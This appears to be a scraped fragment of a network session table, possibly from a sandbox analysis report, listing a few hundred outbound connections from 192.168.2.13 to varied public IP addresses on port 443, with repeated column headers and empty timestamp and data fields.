                                        21925192.168.2.136073288.225.184.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21926192.168.2.1358714102.95.216.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21927192.168.2.1348076181.63.83.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21928192.168.2.1341054129.184.197.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21929192.168.2.1336208213.160.163.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21930192.168.2.1354652109.180.91.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21931192.168.2.1353180150.100.81.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21932192.168.2.1345740219.78.229.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21933192.168.2.134675477.214.115.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21934192.168.2.1336316146.254.195.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21935192.168.2.1355892114.5.66.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21936192.168.2.135622840.144.234.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21937192.168.2.135693417.96.61.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21938192.168.2.1348028145.152.243.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21939192.168.2.133954499.226.101.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21940192.168.2.1335576154.91.154.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21941192.168.2.133395031.195.246.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21942192.168.2.1344898181.80.184.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21943192.168.2.135891838.177.81.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21944192.168.2.1339064182.211.246.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21945192.168.2.1355258163.199.254.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21946192.168.2.134443025.251.58.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21947192.168.2.135407020.74.41.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21948192.168.2.1335884152.224.52.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21949192.168.2.1333782209.69.217.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21950192.168.2.135041061.5.204.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21951192.168.2.1339676198.162.36.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21952192.168.2.135788475.154.176.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21953192.168.2.1358470152.210.24.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21954192.168.2.1360806219.210.53.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21955192.168.2.1335716170.9.43.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21956192.168.2.1346016221.214.6.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21957192.168.2.133305259.118.194.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21958192.168.2.1341706148.34.73.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21959192.168.2.1340502104.89.109.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21960192.168.2.1351134189.154.89.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21961192.168.2.133958658.80.142.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21962192.168.2.1339170183.158.248.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21963192.168.2.1348870136.165.167.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21964192.168.2.1350076151.132.21.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21965192.168.2.1352914198.94.119.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21966192.168.2.1335162211.100.97.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21967192.168.2.1340442179.255.10.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21968192.168.2.1350806117.66.129.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21969192.168.2.1350366143.200.64.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21970192.168.2.1344330107.43.145.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21971192.168.2.133593065.223.207.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21972192.168.2.1334790136.153.205.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21973192.168.2.1334860192.186.96.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21974192.168.2.1350858133.248.41.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21975192.168.2.134345245.121.104.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21976192.168.2.1345072116.44.227.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21977192.168.2.1352278189.54.227.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21978192.168.2.1336466143.188.227.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21979192.168.2.1357796107.154.245.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21980192.168.2.1360166104.241.49.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21981192.168.2.1358124167.80.92.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21982192.168.2.134942612.30.189.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21983192.168.2.133395451.0.78.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21984192.168.2.134905214.32.118.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21985192.168.2.1354154208.26.238.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21986192.168.2.1337730143.152.165.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21987192.168.2.134843046.17.94.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21988192.168.2.135351040.0.146.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21989192.168.2.1353830192.220.124.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21990192.168.2.1351306219.45.180.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21991192.168.2.135133417.97.141.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21992192.168.2.1360530166.98.0.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21993192.168.2.1338822194.70.72.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21994192.168.2.1354130169.78.176.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21995192.168.2.1341516169.25.101.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21996192.168.2.134102667.210.78.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21997192.168.2.134364290.236.250.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21998192.168.2.1342902185.37.37.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21999192.168.2.1339712176.214.250.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22000192.168.2.1358648145.5.150.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22001192.168.2.1356018216.28.116.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22002192.168.2.1337788182.46.154.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22003192.168.2.1337856116.250.60.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22004192.168.2.135931469.218.128.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22005192.168.2.1358044134.174.60.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22006192.168.2.1343862189.177.4.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22007192.168.2.134445077.137.176.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22008192.168.2.1335642151.134.164.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22009192.168.2.1335348165.138.0.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22010192.168.2.1346576220.182.183.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22011192.168.2.1345052122.53.85.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22012192.168.2.1338350223.180.152.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22013192.168.2.1352674202.4.236.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22014192.168.2.1354462213.34.40.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22015192.168.2.133414813.29.92.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22016192.168.2.133743074.107.223.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22017192.168.2.1353194186.61.89.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22018192.168.2.1349938131.154.149.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22019192.168.2.1345272128.138.52.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22020192.168.2.1341548182.236.8.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22021192.168.2.1343032178.106.152.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22022192.168.2.1355674188.224.94.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22023192.168.2.134497489.54.5.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22024192.168.2.133518862.66.148.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22025192.168.2.1357754140.203.43.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22026192.168.2.1333926201.35.140.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22027192.168.2.1351348182.252.18.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22028192.168.2.134633640.46.0.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22029192.168.2.1339342124.75.185.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22030192.168.2.134341458.65.253.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22031192.168.2.1339778176.166.145.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22032192.168.2.1354572104.242.78.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22033192.168.2.1342866176.96.76.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22034192.168.2.1347948113.69.41.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22035192.168.2.1334542151.208.46.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22036192.168.2.135602270.140.0.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22037192.168.2.1347816124.110.148.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22038192.168.2.1345384103.115.220.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22039192.168.2.1357208164.209.187.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22040192.168.2.133578418.245.121.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22041192.168.2.1354218188.231.65.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22042192.168.2.1333302143.82.177.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22043192.168.2.1346712185.204.100.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22044192.168.2.1350130143.13.48.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22045192.168.2.133312660.244.98.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22046192.168.2.1335178161.134.219.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22047192.168.2.1360368103.11.233.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22048192.168.2.1335678209.180.169.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22049192.168.2.134438073.27.22.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22050192.168.2.1336400110.22.133.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22051192.168.2.1338692161.1.108.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22052192.168.2.133708446.139.246.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22053192.168.2.133854432.121.79.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22054192.168.2.135303873.127.91.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22055192.168.2.1333914193.183.206.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22056192.168.2.1359398158.96.243.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22057192.168.2.135002678.220.207.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22058192.168.2.133314691.9.218.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22059192.168.2.1359466193.234.47.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22060192.168.2.135293268.130.38.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22061192.168.2.134541035.232.195.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22062192.168.2.134315875.105.111.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22063192.168.2.1347126194.66.6.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22064192.168.2.134017635.212.39.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22065192.168.2.1360870144.243.114.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22066192.168.2.136043823.161.242.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22067192.168.2.1337960150.54.55.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22068192.168.2.1335822210.26.39.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22069192.168.2.134413498.160.181.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22070192.168.2.1334840165.26.13.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22071192.168.2.1342380135.130.46.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22072192.168.2.1337412221.5.18.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22073192.168.2.13496121.149.79.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22074192.168.2.1336358183.118.4.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22075192.168.2.1340126171.38.192.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22076192.168.2.1335398131.237.78.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22077192.168.2.133595619.18.111.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22078192.168.2.133787686.37.58.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22079192.168.2.1344186120.46.219.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22080192.168.2.1360528103.40.193.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22081192.168.2.1333396131.128.250.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22082192.168.2.1358826183.233.174.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22083192.168.2.135741013.253.243.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22084192.168.2.134378417.36.187.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22085192.168.2.136001079.147.99.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22086192.168.2.1341038100.25.162.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22087192.168.2.1351872173.106.216.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22088192.168.2.1357310176.111.145.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22089192.168.2.135277413.44.2.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22090192.168.2.1360320140.213.185.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22091192.168.2.133509291.47.186.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22092192.168.2.1336372157.48.249.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22093192.168.2.13378465.5.131.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22094192.168.2.133431868.185.30.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22095192.168.2.1356452139.131.218.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22096192.168.2.1335974218.168.26.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22097192.168.2.136056292.231.114.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22098192.168.2.1357096199.23.235.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22099192.168.2.135380651.41.12.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22100192.168.2.13373465.103.240.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22101192.168.2.134041253.69.179.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22102192.168.2.1350902131.155.185.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22103192.168.2.135858264.190.251.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22104192.168.2.1352978167.143.29.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22105192.168.2.134323692.72.209.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22106192.168.2.134072236.207.185.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22107192.168.2.1346804105.244.142.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22108192.168.2.133903873.120.33.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22109192.168.2.1339536123.156.158.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22110192.168.2.1360232120.87.66.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22111192.168.2.134032886.223.71.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22112192.168.2.1344728189.187.100.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22113192.168.2.1341392176.79.36.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22114192.168.2.135631652.168.133.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22115192.168.2.1356060124.109.138.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22116192.168.2.133762890.121.140.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22117192.168.2.1353888213.93.144.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22118192.168.2.1358594219.202.150.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22119192.168.2.1340442114.230.30.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22120192.168.2.1341336186.85.191.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22121192.168.2.134627041.51.172.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22122192.168.2.1343864119.91.76.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22123192.168.2.1354820111.166.44.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22124192.168.2.134991420.9.42.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22125192.168.2.1348440159.75.44.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22126192.168.2.135566480.194.117.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22127192.168.2.1339986193.58.161.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22128192.168.2.1332906171.77.164.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22129192.168.2.134666259.100.113.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22130192.168.2.135679667.86.163.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22131192.168.2.1358186118.204.174.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22132192.168.2.1342362187.241.159.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22133192.168.2.1339360115.187.15.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22134192.168.2.13517205.208.57.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22135192.168.2.134620262.131.197.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22136192.168.2.1348216210.220.181.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22137192.168.2.135431096.153.79.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22138192.168.2.1357886116.18.82.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22139192.168.2.135238883.35.125.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22140192.168.2.134423699.90.124.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22141192.168.2.13487084.165.236.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22142192.168.2.1348262148.254.54.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22143192.168.2.1334188177.60.171.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22144192.168.2.1360782117.213.87.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22145192.168.2.133419677.135.47.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22146192.168.2.135040297.222.2.18443
                                        TimestampBytes transferredDirectionData


